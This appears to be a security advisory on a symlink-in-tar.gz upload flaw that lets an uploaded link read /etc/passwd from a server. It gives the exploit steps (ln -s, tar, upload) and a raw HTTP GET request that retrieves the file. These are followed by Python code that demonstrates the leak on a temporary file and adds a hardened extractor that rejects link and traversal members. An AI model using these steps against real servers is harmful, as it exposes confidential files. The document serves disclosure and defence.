Summary
When an uploaded tar.gz archive is decompressed on the server, symbolic link (soft link) members are not handled. An attacker can create a file file1 that is a soft link pointing to a target file file2, pack that link into a tar.gz archive and upload it. When the decompressed file1 is later requested from the server, it resolves to file2 on the victim server, so the server returns the contents of file2 instead of anything the attacker uploaded.
Details
1 Create a soft link pointing to the target file
ln -s /etc/passwd ff2425
2 Pack the link into a tar.gz archive
tar -czf archive.tar.gz ff2425
3 Upload the tar.gz file.
4 After the upload the server shows the path of the extracted member. Requesting that path makes the server follow the link and serve the target file:
GET /file=private_upload/default_user/2024-12-23-17-26-13/archive.tar.gz.extract/ff2425 HTTP/1.1
Host: 192.168.137.14:53583
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.137.14:53583/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: js_darkmode_cookie=True
Connection: keep-alive
Impact:
Because of this vulnerability, any file on the server that the service's user account can read can be retrieved this way, which seriously affects data confidentiality.
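The following is an added example, not code from the report or from the affected project. It replays the report in Python against a constructed secret file in a temporary directory instead of /etc/passwd: an in-memory tar.gz with a single symlink member is extracted once by an unchecked extractall() call (modelling the vulnerable server) and once by a hardened extractor that refuses link members and path traversal before writing anything. The function and file names are assumptions for the demonstration.

```python
import io
import os
import tarfile
import tempfile


class UnsafeArchiveMember(ValueError):
    """An archive member that would alias or escape the extraction directory."""


def build_archive(files: dict, symlinks: dict) -> bytes:
    """Build an in-memory tar.gz. `files` maps member name -> bytes; `symlinks`
    maps member name -> link target. A symlink-only archive reproduces
    `ln -s /etc/passwd ff2425; tar -czf archive.tar.gz ff2425` without touching disk."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        for name, target in symlinks.items():
            info = tarfile.TarInfo(name=name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)
    return buf.getvalue()


def extract_unsafe(archive: bytes, dest: str) -> None:
    """Extraction with no member checks, as the vulnerable server does.
    Python 3.12+ may default extractall() to the 'data' filter, so the
    fully_trusted filter is requested explicitly to keep the old behaviour."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        if hasattr(tarfile, "fully_trusted_filter"):
            tar.extractall(dest, filter="fully_trusted")
        else:
            tar.extractall(dest)


def extract_safe(archive: bytes, dest: str) -> list:
    """Write only regular files and directories whose resolved path stays under
    dest. Symlinks and hardlinks are rejected instead of being created, so no
    extracted name can later resolve to a file elsewhere on the server."""
    dest = os.path.realpath(dest)
    written = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                raise UnsafeArchiveMember(f"link rejected: {m.name} -> {m.linkname}")
            if not (m.isreg() or m.isdir()):
                raise UnsafeArchiveMember(f"special file rejected: {m.name}")
            out = os.path.realpath(os.path.join(dest, m.name))
            if os.path.commonpath([dest, out]) != dest:
                raise UnsafeArchiveMember(f"path escapes destination: {m.name}")
            if m.isdir():
                os.makedirs(out, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with tar.extractfile(m) as src, open(out, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(out, dest).replace(os.sep, "/"))
    return written


def demo() -> dict:
    """Replay the report against a constructed secret file (stand-in for
    /etc/passwd) and return what each extractor lets the server read."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")  # constructed, not a real system file
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        evil = build_archive({}, {"ff2425": secret})

        # Vulnerable path: extract, then serve <dir>/archive.tar.gz.extract/ff2425.
        unsafe_dir = os.path.join(tmp, "archive.tar.gz.extract")
        os.mkdir(unsafe_dir)
        extract_unsafe(evil, unsafe_dir)
        with open(os.path.join(unsafe_dir, "ff2425")) as f:
            result["leaked"] = f.read()  # the secret's content, read through the link

        # Hardened path: link and traversal members are refused before any write.
        safe_dir = os.path.join(tmp, "safe.extract")
        os.mkdir(safe_dir)
        for key, archive in (("symlink", evil),
                             ("traversal", build_archive({"../escape.txt": b"x"}, {}))):
            try:
                extract_safe(archive, safe_dir)
                result[key + "_rejected"] = None
            except UnsafeArchiveMember as exc:
                result[key + "_rejected"] = str(exc)
        result["safe_dir_contents"] = sorted(os.listdir(safe_dir))

        # A benign archive still extracts normally.
        result["benign"] = extract_safe(build_archive({"notes/a.txt": b"hello"}, {}), safe_dir)
    return result


if __name__ == "__main__":
    print(demo())
```

On Python 3.12 and later, `tar.extractall(dest, filter="data")` also refuses a link whose target lies outside the destination, but refusing link members outright is the simpler policy for an upload handler that never needs them. Independently of extraction, the file-serving endpoint should resolve the requested path with realpath and confirm it is still under the upload root before opening it.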